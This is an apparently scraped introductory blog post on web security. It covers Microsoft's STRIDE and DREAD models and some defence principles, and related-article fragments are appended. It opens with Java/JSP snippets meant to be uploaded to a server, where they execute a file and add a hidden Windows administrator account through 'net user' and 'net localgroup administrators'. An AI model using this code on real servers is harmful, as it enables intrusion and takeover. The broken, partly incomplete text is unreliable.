Talk In Web Security(安全世界观): Devleping a Secure WebSite

Writer:BYSocket(泥沙砖瓦浆木匠)

Reprint it anywhere u want.

Why to write about Web Security?

A java file can hack your server.One JSP can download any file. How to do this?
  1. Write a JSP and upload to the server.
  2. Use JSP to download any bug by HttpClient. 
  3. Open the virus and get/add the infomation of admin or datas
We can see some from what I write.Its easy but useful:

?


1

2

3

4

5

6

7

8

9

10

11

<font size="4" face="宋体"> if(!IsWindows())

                {

                    Process process = Runtime.getRuntime().exec("chmod 777 "+strExeFile);

                    

                    if (process.waitFor() != 0)

                        out.println("FAIL ---> when open file");

                }

                

                Process process = Runtime.getRuntime().exec(strExeFile);

                if (process.waitFor() == 0)

                    out.println("SUCCESS ---> When open the file");</font>

Use Java to open the bug.And then get an administrator user.

?


1

2

3

4

5

6

7

8

9

10

11

12

if(IsWindows())

{

    String execStr = "cmd.exe /C " + "net user " + strAcc + " " + strPwd + " /add";

    Process process = Runtime.getRuntime().exec(execStr);  

    

    if (process.waitFor() == 0)

    {

        Runtime.getRuntime().exec("cmd.exe /C " + "net localgroup administrators " + strAcc + " /add");

    }

    else

        out.print("FAIL ---> when " + execStr);

}

Its about how to use java to get add an administrator user.

Here are some injections that we can see anywhere.So we need Learn the Web Security. First we can learn from the Web history.

Some of Web Security needed to know

Since the environment getting worse,like Haze.So many persons wear Masks when going out.Just like the way to protect ourselves ,we trust the Masks. Its the same as web security.

Note:’Web Security is based on the trust,every way to design on Web Security is also based on the trusts.’

Many web attacks like Haze:
  1. XSS

2. CRLF Injection

3. X-PATH Injection

4. HTML Injection

5. JavaScript Injection

XSS Development

So there is a question:’How to analysis the web security of software or project?’

STRIDE (security) DREAD by Microsoft

STRIDE

STRIDE is a system developed by Microsoft for thinking about computer security threats.The threat categories are:
  1. Spoofing of user identity

2. Tampering

3. Repudiation

4. Infomation disclosure

5. Denial of Service

6. Elevation of privilege

DREAD

The problem with a simplistic rating system is that team members usually will not agree on ratings. To help solve this, add new dimensions that help determine what the impact of a security threat really means. At Microsoft, the DREAD model is used to help calculate risk. By using the DREAD model, you arrive at the risk rating for a given threat by asking the following questions:

  1. Damage potential: How great is the damage if the vulnerability is exploited?

  2. Reproducibility: How easy is it to reproduce the attack?

  3. Exploitability: How easy is it to launch an attack?

  4. Affected users: As a rough percentage, how many users are affected?

  5. Discoverability: How easy is it to find the vulnerability?

So after these categories,a good way to design on Web Security has some features:

1. Solve problem in effect

2. Good experience for users

3. Low coupling

4. Easy to extend and upgrade

How to Devlep a Secure WebSite

  Note: ‘ Security is a normal subject and a poised art.’

1. Secure By Default

Its also the security of users.We can create The White List and The Black List and limits of user operation.

2. Defense in Depth

Defense in Depth is a crucial model for implementing effective information security. The details of such a diverse model are what make it successful, I have put together a series of eight webcasts on this topic. Here are 7 levels:

3. Quarantine between Data and Demo

4. Uncertainly of unpredictability

The paramters may be easy to guess.So let them be hard to guess.

Think in Web Security

Like a bucket of water, we trust the bucket and water.Its the Security.When the bucket has the chemistry-poison,the security will be broken.
Note:‘Open Free Share’

G night~

Writer:BYSocket(泥沙砖瓦浆木匠)

Reprint it anywhere u want.

时间: 2024-10-13 17:03:37

Talk In Web Security(安全世界观): Devleping a Secure WebSite的相关文章

Talk In Web Security(安全世界观): Devleping a Secure We

Writer:BYSocket(泥沙砖瓦浆木匠) 微博:BYSocket 豆瓣:BYSocket Reprint it anywhere u want. Why to write about Web Security? A java file can hack your server.One JSP can download any file. How to do this?   1. Write a JSP and upload to the server.   2. Use JSP to d

alk In Web Security(安全世界观): Devleping a Secure Wesite

Writer:BYSocket(泥沙砖瓦浆木匠) 微博:BYSocket 豆瓣:BYSocket Reprint it anywhere u want. Why to write about Web Security? A java file can hack your server.One JSP can download any file. How to do this? 1. Write a JSP and upload to the server. 2. Use JSP to downl

System.Web.Security 在winform中是什么命名空间呢

des.Key = ASCIIEncoding.ASCII.GetBytes(System.Web.Security.FormsAuthentication.HashPasswordForStoringInConfig 以上代码在winform中,老是报如下错误,错误 2 命名空间“System.Web”中不存在类型或命名空间名称“Security”.是否缺少程序集引用? 解决方法: 首先确保你使用的是完整版的.net框架,在项目-属性-目标框架中,下拉选择的不是.net 4.0 client 

无法将类型为“System.Security.Principal.GenericIdentity”的对象强制转换为类型“System.Web.Security.FormsIdentity”。

这次的系统包含两个子系统,所以做了一个分角色的身份验证系统. web.config <system.web>中设置 <authentication mode="Forms"> <!--验证方式为窗体验证--> <forms name=".ASPXAUTH" loginUrl="~/login.aspx" protection="All" timeout="60" p

web项目的两个创建形式website和webapplication(转)

前言 在利用VS2010创建web项目的时候,会有两个选择.可以选择直接创建website网站,还可以选择使用 webapplication应用程序.刚刚接触web开发,看到这两个就疑惑了,既然是都可以,那为什么有两个呢?这样 的分开,肯定是有它的道理的.下面是我对这个问题进行的一些总结,都是从网上找的一些资料,与大家分 享. website 中文名称网站,是指在互联网上,根据一定的规则,使用HTML.ASP等代码语言制作的用于展示特 定内容的相关网页的集合,有可供管理人员操作的后台及用户使用的

Web Security of XSS

起这个标题有点大,但是作为web安全来讲,XSS还是蛮基础,但似乎又不为很多高手所常用,网上资料虽然很多,但是你真正去实作的时候,又是一头雾水,常常心生不是那么一回事哦的感慨,所以我就想写点或者说记点实践基础性的东西. 要学习XSS,自己搭个php环境还是很有必要的.其实很简单,一二三步就可以 . 第一步安装FastCGI. 第二步去这里下载phpManger,去这里下载php5.6.3, 将后者解压放在一个目录中,然后安装phpManager, 发现IIS就会多一个phpManager. 注册

[Web Security] JSON Hijacking

After reading the blog, the main take away from there is: "Never send back JOSN array to the client side, it is easy to be hijacked, using JSON object, it is because JSON object is not considered to be a valid Javascript to execute"

[Web Security] Create a hash salt password which can stored in DB

We cannot directly store user password in the database. What need to do is creating a hashed & salted string which reperstanting the user password. This password is not reverable. And very hard for hacker to guess what is the origial password by usin

Web信息安全实践_1.5 SSL (secure socket layer)

为什么需要SSL? 明文不安全 明文传输的用户名和密码被侦听到 实验:使用wireshark抓包 Phishing(钓鱼攻击): http://item.taobao.com/ http.//item.taobao/auction.com/ 什么是SSL? 1994.网景公司(Netscape) SSL位于传输层之上,应用层之下 具有良好的接口,为上层应用提供服务 e.g. http→https ftp→sftp SSL的功能:在通信双方之间提供保密性和完整性 服务器认证 用户身份认证(Phis